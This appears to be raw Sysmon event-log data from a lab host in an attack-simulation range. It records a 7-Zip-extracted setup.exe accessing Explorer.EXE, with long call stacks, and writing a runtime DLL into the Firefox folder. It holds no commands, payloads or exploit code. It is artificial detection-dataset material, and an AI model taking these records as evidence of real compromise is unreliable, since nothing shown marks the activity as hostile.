13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-locale-l1-1-0.dll2021-01-18 13:59:52.177 10341000x800000000000000014396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
